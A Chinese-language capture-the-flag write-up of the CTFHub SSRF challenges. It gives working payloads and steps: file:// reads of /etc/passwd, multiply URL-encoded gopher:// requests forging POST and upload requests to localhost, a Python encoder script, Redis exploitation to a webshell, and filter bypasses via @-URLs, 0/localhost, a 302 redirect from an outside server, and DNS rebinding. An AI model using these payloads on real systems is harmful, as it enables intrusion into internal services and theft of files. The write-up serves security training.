內網訪問#
這題比較簡單,直接訪問即可。
偽協議讀取文件#
file 偽協議
先讀取 /etc/passwd
讀取 web 目錄下的 flag.php
端口掃描#
POST 請求#
嘗試 GET 請求發送如下包,返回如下內容;
題目提示發送 POST 請求,那就需要用到 gopher 協議了。
根據響應包,構造 gopher payload。
POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
key=a80ea933ead842996c204517423ae75e
編碼 url:https://www.bejson.com/enc/urlencode/,或者使用 burp 的 decode 功能。
第一次編碼後內容如下:
POST%20/flag.php%20HTTP/1.1%0AHost:%20127.0.0.1:80%0AContent-Type:%20application/x-www-form-urlencoded%0AContent-Length:%2036%0A%0Akey=200890c79882ceba049a7d02bee2ef1f
把 %0A 換成 %0D%0A
POST%20%2Fflag.php%20HTTP%2F1.1%0D%0AHost%3A%20127.0.0.1%3A80%0D%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A%2036%0D%0A%0D%0Akey%3D200890c79882ceba049a7d02bee2ef1f
第二次編碼
POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253D200890c79882ceba049a7d02bee2ef1f
所以最終 payload 如下:
?url=gopher://127.0.0.1:80/_POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253D200890c79882ceba049a7d02bee2ef1f
然後發送請求
文件上傳#
訪問 flag.php 試試
http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php
無提交框,構造 submit
嘗試使用 file 協議讀取源碼。
根據源碼提示,判斷是否存在文件以及文件不為空,上傳一個 txt 文件,然後抓包。
在構造 payload 之前,需要刪除Accept-Encoding: gzip, deflate
。
POST /flag.php HTTP/1.1
Host: challenge-960f11fca71a9108.sandbox.ctfhub.com:10800
Content-Length: 281
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylrZVoi6bEshmiqB0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Referer: http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundarylrZVoi6bEshmiqB0
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: text/plain
111
------WebKitFormBoundarylrZVoi6bEshmiqB0
Content-Disposition: form-data; name="submit"
提交
------WebKitFormBoundarylrZVoi6bEshmiqB0--
先進行第一次編碼。
POST%20/flag.php%20HTTP/1.1%0AHost:%20challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%0AContent-Length:%20281%0ACache-Control:%20max-age=0%0AUpgrade-Insecure-Requests:%201%0AOrigin:%20http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%0AContent-Type:%20multipart/form-data;%20boundary=----WebKitFormBoundarylrZVoi6bEshmiqB0%0AUser-Agent:%20Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/99.0.4844.74%20Safari/537.36%0AAccept:%20text/html,application/xhtml+xml,application/xml;q=0.9%0AReferer:%20http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php%0AAccept-Language:%20zh-CN,zh;q=0.9%0AConnection:%20close%0A%0A------WebKitFormBoundarylrZVoi6bEshmiqB0%0AContent-Disposition:%20form-data;%20name=%22file%22;%20filename=%221.txt%22%0AContent-Type:%20text/plain%0A%0A111%0A------WebKitFormBoundarylrZVoi6bEshmiqB0%0AContent-Disposition:%20form-data;%20name=%22submit%22%0A%0A%E6%8F%90%E4%BA%A4%0A------WebKitFormBoundarylrZVoi6bEshmiqB0--
把 %0A 換成 %0D%0A,替換後內容如下:
POST%20/flag.php%20HTTP/1.1%0D%0AHost:%20challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%0D%0AContent-Length:%20281%0D%0ACache-Control:%20max-age=0%0D%0AUpgrade-Insecure-Requests:%201%0D%0AOrigin:%20http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%0D%0AContent-Type:%20multipart/form-data;%20boundary=----WebKitFormBoundarylrZVoi6bEshmiqB0%0D%0AUser-Agent:%20Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/99.0.4844.74%20Safari/537.36%0D%0AAccept:%20text/html,application/xhtml+xml,application/xml;q=0.9%0D%0AReferer:%20http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php%0D%0AAccept-Language:%20zh-CN,zh;q=0.9%0D%0AConnection:%20close%0D%0A%0D%0A------WebKitFormBoundarylrZVoi6bEshmiqB0%0D%0AContent-Disposition:%20form-data;%20name=%22file%22;%20filename=%221.txt%22%0D%0AContent-Type:%20text/plain%0D%0A%0D%0A111%0D%0A------WebKitFormBoundarylrZVoi6bEshmiqB0%0D%0AContent-Disposition:%20form-data;%20name=%22submit%22%0D%0A%0D%0A%E6%8F%90%E4%BA%A4%0D%0A------WebKitFormBoundarylrZVoi6bEshmiqB0--
第二次編碼
POST%2520/flag.php%2520HTTP/1.1%250D%250AHost:%2520challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%250D%250AContent-Length:%2520281%250D%250ACache-Control:%2520max-age=0%250D%250AUpgrade-Insecure-Requests:%25201%250D%250AOrigin:%2520http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%250D%250AContent-Type:%2520multipart/form-data;%2520boundary=----WebKitFormBoundarylrZVoi6bEshmiqB0%250D%250AUser-Agent:%2520Mozilla/5.0%2520(Windows%2520NT%252010.0;%2520Win64;%2520x64)%2520AppleWebKit/537.36%2520(KHTML,%2520like%2520Gecko)%2520Chrome/99.0.4844.74%2520Safari/537.36%250D%250AAccept:%2520text/html,application/xhtml+xml,application/xml;q=0.9%250D%250AReferer:%2520http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php%250D%250AAccept-Language:%2520zh-CN,zh;q=0.9%250D%250AConnection:%2520close%250D%250A%250D%250A------WebKitFormBoundarylrZVoi6bEshmiqB0%250D%250AContent-Disposition:%2520form-data;%2520name=%2522file%2522;%2520filename=%25221.txt%2522%250D%250AContent-Type:%2520text/plain%250D%250A%250D%250A111%250D%250A------WebKitFormBoundarylrZVoi6bEshmiqB0%250D%250AContent-Disposition:%2520form-data;%2520name=%2522submit%2522%250D%250A%250D%250A%25E6%258F%2590%25E4%25BA%25A4%250D%250A------WebKitFormBoundarylrZVoi6bEshmiqB0--
第三次編碼
POST%252520/flag.php%252520HTTP/1.1%25250D%25250AHost:%252520challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%25250D%25250AContent-Length:%252520281%25250D%25250ACache-Control:%252520max-age=0%25250D%25250AUpgrade-Insecure-Requests:%2525201%25250D%25250AOrigin:%252520http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%25250D%25250AContent-Type:%252520multipart/form-data;%252520boundary=----WebKitFormBoundarylrZVoi6bEshmiqB0%25250D%25250AUser-Agent:%252520Mozilla/5.0%252520(Windows%252520NT%25252010.0;%252520Win64;%252520x64)%252520AppleWebKit/537.36%252520(KHTML,%252520like%252520Gecko)%252520Chrome/99.0.4844.74%252520Safari/537.36%25250D%25250AAccept:%252520text/html,application/xhtml+xml,application/xml;q=0.9%25250D%25250AReferer:%252520http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php%25250D%25250AAccept-Language:%252520zh-CN,zh;q=0.9%25250D%25250AConnection:%252520close%25250D%25250A%25250D%25250A------WebKitFormBoundarylrZVoi6bEshmiqB0%25250D%25250AContent-Disposition:%252520form-data;%252520name=%252522file%252522;%252520filename=%2525221.txt%252522%25250D%25250AContent-Type:%252520text/plain%25250D%25250A%25250D%25250A111%25250D%25250A------WebKitFormBoundarylrZVoi6bEshmiqB0%25250D%25250AContent-Disposition:%252520form-data;%252520name=%252522submit%252522%25250D%25250A%25250D%25250A%2525E6%25258F%252590%2525E4%2525BA%2525A4%25250D%25250A------WebKitFormBoundarylrZVoi6bEshmiqB0--
最終 payload
GET /?url=127.0.0.1/index.php?url=gopher://127.0.0.1:80/_POST%252520/flag.php%252520HTTP/1.1%25250D%25250AHost:%252520challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%25250D%25250AContent-Length:%252520281%25250D%25250ACache-Control:%252520max-age=0%25250D%25250AUpgrade-Insecure-Requests:%2525201%25250D%25250AOrigin:%252520http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%25250D%25250AContent-Type:%252520multipart/form-data;%252520boundary=----WebKitFormBoundarylrZVoi6bEshmiqB0%25250D%25250AUser-Agent:%252520Mozilla/5.0%252520(Windows%252520NT%25252010.0;%252520Win64;%252520x64)%252520AppleWebKit/537.36%252520(KHTML,%252520like%252520Gecko)%252520Chrome/99.0.4844.74%252520Safari/537.36%25250D%25250AAccept:%252520text/html,application/xhtml+xml,application/xml;q=0.9%25250D%25250AReferer:%252520http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php%25250D%25250AAccept-Language:%252520zh-CN,zh;q=0.9%25250D%25250AConnection:%252520close%25250D%25250A%25250D%25250A------WebKitFormBoundarylrZVoi6bEshmiqB0%25250D%25250AContent-Disposition:%252520form-data;%252520name=%252522file%252522;%252520filename=%2525221.txt%252522%25250D%25250AContent-Type:%252520text/plain%25250D%25250A%25250D%25250A111%25250D%25250A------WebKitFormBoundarylrZVoi6bEshmiqB0%25250D%25250AContent-Disposition:%252520form-data;%252520name=%252522submit%252522%25250D%25250A%25250D%25250A%2525E6%25258F%252590%2525E4%2525BA%2525A4%25250D%25250A------WebKitFormBoundarylrZVoi6bEshmiqB0-- HTTP/1.1
Host: challenge-960f11fca71a9108.sandbox.ctfhub.com:10800
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
二次編碼腳本#
import urllib.parse
payload =\
"""POST /flag.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------224170729831654278414248977569
Content-Length: 525
Origin: http://challenge-fbeb7e53e47ecd22.sandbox.ctfhub.com:10800
Connection: close
Referer: http://challenge-fbeb7e53e47ecd22.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php
Upgrade-Insecure-Requests: 1
-----------------------------224170729831654278414248977569
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: application/octet-stream
-----------------------------224170729831654278414248977569
Content-Disposition: form-data; name="submit"
123
-----------------------------224170729831654278414248977569--
123
-----------------------------224170729831654278414248977569
Content-Disposition: form-data; name="submit"
123
-----------------------------224170729831654278414248977569--
"""
#注意後面一定要有回車,回車結尾表示http請求結束
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result) # 這裡因為是GET請求所以要進行兩次url編碼
redis#
判斷是否存在 redis 漏洞
利用Gopherus 工具生成 payload。
通過url 編碼網站進行二次編碼
發送數據包
webshell 連接
URL Bypass#
提示只能通過http://notfound.ctfhub.com 這個域去訪問,需要進行繞過,可以通過 @符號去繞過。
http://challenge-393a59f384add707.sandbox.ctfhub.com:10800/?url=http://[email protected]/flag.php
數字 IP Bypass#
黑名單,ban 掉了 127 以及 172.,這種情況下有很多繞過方式。
http://challenge-f066296bec5527d2.sandbox.ctfhub.com:10800/?url=http://0/flag.php
http://challenge-f066296bec5527d2.sandbox.ctfhub.com:10800/?url=http://localhost/flag.php
302 跳轉 Bypass#
根據題目提示,需要利用 302 去 bypass。
利用 302bypass 需要在 vps 伺服器上搭建 http 以及 php 服務,然後創建下面的 php 文件。
<?php
header("Location:http://127.0.0.1/flag.php");
?>
最終 url 為
http://challenge-f066296bec5527d2.sandbox.ctfhub.com:10800/?url=http://1.116.2.18:8009/302.php
如果沒有 php 環境則代碼原樣輸出。
另一種方式,先獲取源碼。
過濾了
/127|172|10|192/
但是未過濾 localhost
DNS 重綁定 Bypass#
通過https://lock.cmpxchg8b.com/rebinder.html 網站進行解題
這個網站會隨機只想上圖兩個中的隨機一個內網 ip,由於 127 段是回環地址,所以 AB 兩個 ip 都指向 127.0.0.1,每一個都能訪問 localhost。
http://challenge-c3fc88b00a1e6234.sandbox.ctfhub.com:10800/?url=http://7f000001.7f000002.rbndr.us/flag.php
參考:
CTFHub-SSRF - 文件上傳
CTFHUB - 技能樹 - Web-SSRF - 上傳文件
淺談 DNS 重綁定漏洞